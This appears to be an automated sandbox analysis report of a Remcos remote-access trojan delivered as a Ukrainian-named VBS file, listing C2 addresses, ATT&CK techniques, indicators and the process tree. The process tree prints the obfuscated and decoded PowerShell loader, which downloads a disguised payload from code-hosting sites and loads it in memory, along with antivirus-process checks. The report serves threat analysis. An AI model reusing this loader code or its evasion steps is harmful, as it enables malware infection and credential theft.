remcos | 0c96359b10b505830decc2c11ed165479af4f89f46c0994428833100e5195cbc

Analysis

max time kernel
45s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-10-2024 11:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Документи.vbs
Size

15KB
MD5

f38ba7aa784bb8bcc526ecd9c6953bed
SHA1

f32b215e22d5a7728b2bc2be84f3697e33126f13
SHA256

2837b1cfc87c988e5475f47e4c9f146eb4094e192eebc91c4171d62a60735cd3
SHA512

729adffc803b7ec7c8202e731b81a9c79bdb361a59e9bc1d250e7831c801de6ea3e2b0ff3e0a6d8dadb3f5d406242d128273c473b3074ceb2096a52fbd9e5de8
SSDEEP

192:sWZsOMqxnDxLInuYCWGHn5qg/tyZdG97qwYVLtGcGPJZMxu2hlYF9WBMDxpnO/9m:sBO9xLIuLWGHnD0QWVLQPJmxNSiMFpWm

Score

10^/10

remcos host_one collection discovery execution persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

host_one

101.99.94.69:2404

101.99.94.69:8090

101.99.94.69:44444

101.99.94.69:80

101.99.94.69:21

101.99.94.69:4899

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
rmc
mouse_option
false
mutex
Rmc-UP4CTA
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1748 created 3520	1748	Lucas.pif	56

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral3/memory/1968-130-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral3/memory/2756-131-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral3/memory/1156-137-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral3/memory/2756-131-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral3/memory/1968-130-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
2	3204	powershell.exe
20	3204	powershell.exe
22	3204	powershell.exe
31	4088	powershell.exe
33	4088	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1800	powershell.exe
4088	powershell.exe
956	powershell.exe
3204	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	PdfReaderEn.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
2420	PdfReaderEn.EXE
4712	MicrosoftServiceUpdater.exe
1748	Lucas.pif

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	MicrosoftServiceUpdater.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
19	bitbucket.org
20	bitbucket.org
31	bitbucket.org
1	raw.githubusercontent.com
2	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	api.ipify.org

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2628	tasklist.exe
1732	tasklist.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3204 set thread context of 4244	3204	powershell.exe	92
PID 4088 set thread context of 3788	4088	powershell.exe	117
PID 3788 set thread context of 1968	3788	RegAsm.exe	120
PID 3788 set thread context of 2756	3788	RegAsm.exe	122
PID 3788 set thread context of 1156	3788	RegAsm.exe	124

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\PostsPatrick	PdfReaderEn.EXE
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RegAsm.exe
File opened for modification	C:\Windows\DesignerQuiet	PdfReaderEn.EXE
File opened for modification	C:\Windows\HardwoodBrochure	PdfReaderEn.EXE
File opened for modification	C:\Windows\ConcreteChaos	PdfReaderEn.EXE
File opened for modification	C:\Windows\RespondingBeans	PdfReaderEn.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lucas.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PdfReaderEn.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
956	powershell.exe
956	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
1800	powershell.exe
1800	powershell.exe
4088	powershell.exe
4088	powershell.exe
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif
1968	RegAsm.exe
1968	RegAsm.exe
1156	RegAsm.exe
1156	RegAsm.exe
1968	RegAsm.exe
1968	RegAsm.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
3788	RegAsm.exe
3788	RegAsm.exe
3788	RegAsm.exe
3788	RegAsm.exe
3788	RegAsm.exe
3788	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	2628	tasklist.exe
Token: SeDebugPrivilege	1732	tasklist.exe
Token: SeDebugPrivilege	1156	RegAsm.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1748	Lucas.pif
1748	Lucas.pif
1748	Lucas.pif

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3788	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3388 wrote to memory of 956	3388	WScript.exe	85
PID 3388 wrote to memory of 956	3388	WScript.exe	85
PID 956 wrote to memory of 3204	956	powershell.exe	87
PID 956 wrote to memory of 3204	956	powershell.exe	87
PID 3204 wrote to memory of 3396	3204	powershell.exe	90
PID 3204 wrote to memory of 3396	3204	powershell.exe	90
PID 3204 wrote to memory of 3396	3204	powershell.exe	90
PID 3204 wrote to memory of 4820	3204	powershell.exe	91
PID 3204 wrote to memory of 4820	3204	powershell.exe	91
PID 3204 wrote to memory of 4820	3204	powershell.exe	91
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 3204 wrote to memory of 4244	3204	powershell.exe	92
PID 4244 wrote to memory of 2420	4244	RegAsm.exe	94
PID 4244 wrote to memory of 2420	4244	RegAsm.exe	94
PID 4244 wrote to memory of 2420	4244	RegAsm.exe	94
PID 2420 wrote to memory of 1404	2420	PdfReaderEn.EXE	95
PID 2420 wrote to memory of 1404	2420	PdfReaderEn.EXE	95
PID 2420 wrote to memory of 1404	2420	PdfReaderEn.EXE	95
PID 4244 wrote to memory of 4712	4244	RegAsm.exe	97
PID 4244 wrote to memory of 4712	4244	RegAsm.exe	97
PID 4712 wrote to memory of 2512	4712	MicrosoftServiceUpdater.exe	98
PID 4712 wrote to memory of 2512	4712	MicrosoftServiceUpdater.exe	98
PID 2512 wrote to memory of 2084	2512	cmd.exe	100
PID 2512 wrote to memory of 2084	2512	cmd.exe	100
PID 2084 wrote to memory of 1800	2084	WScript.exe	101
PID 2084 wrote to memory of 1800	2084	WScript.exe	101
PID 1800 wrote to memory of 4088	1800	powershell.exe	103
PID 1800 wrote to memory of 4088	1800	powershell.exe	103
PID 1404 wrote to memory of 2628	1404	cmd.exe	105
PID 1404 wrote to memory of 2628	1404	cmd.exe	105
PID 1404 wrote to memory of 2628	1404	cmd.exe	105
PID 1404 wrote to memory of 1744	1404	cmd.exe	106
PID 1404 wrote to memory of 1744	1404	cmd.exe	106
PID 1404 wrote to memory of 1744	1404	cmd.exe	106
PID 1404 wrote to memory of 1732	1404	cmd.exe	107
PID 1404 wrote to memory of 1732	1404	cmd.exe	107
PID 1404 wrote to memory of 1732	1404	cmd.exe	107
PID 1404 wrote to memory of 1664	1404	cmd.exe	108
PID 1404 wrote to memory of 1664	1404	cmd.exe	108
PID 1404 wrote to memory of 1664	1404	cmd.exe	108
PID 1404 wrote to memory of 4516	1404	cmd.exe	109
PID 1404 wrote to memory of 4516	1404	cmd.exe	109
PID 1404 wrote to memory of 4516	1404	cmd.exe	109
PID 1404 wrote to memory of 4572	1404	cmd.exe	110
PID 1404 wrote to memory of 4572	1404	cmd.exe	110
PID 1404 wrote to memory of 4572	1404	cmd.exe	110
PID 1404 wrote to memory of 656	1404	cmd.exe	111
PID 1404 wrote to memory of 656	1404	cmd.exe	111
PID 1404 wrote to memory of 656	1404	cmd.exe	111
PID 1404 wrote to memory of 1748	1404	cmd.exe	112
PID 1404 wrote to memory of 1748	1404	cmd.exe	112
PID 1404 wrote to memory of 1748	1404	cmd.exe	112
PID 1404 wrote to memory of 4040	1404	cmd.exe	113

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Документи.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBi#H##awBy#Gs#bwBk#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.bpkrkod/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3204
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3396
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4820
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4244
      - C:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXE
        
        C:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXE
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1404
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1744
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1732
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1664
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 603423
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4516
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "speechesdjexpandingsoviet" Controllers
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4572
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:656
        
        C:\Users\Admin\AppData\Local\Temp\603423\Lucas.pif
        
        Lucas.pif s
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1748
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4040
      - C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exe
        
        C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4712
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c one.vbs
        7⤵
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:2512
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\one.vbs"
        8⤵
        Checks computer location settings
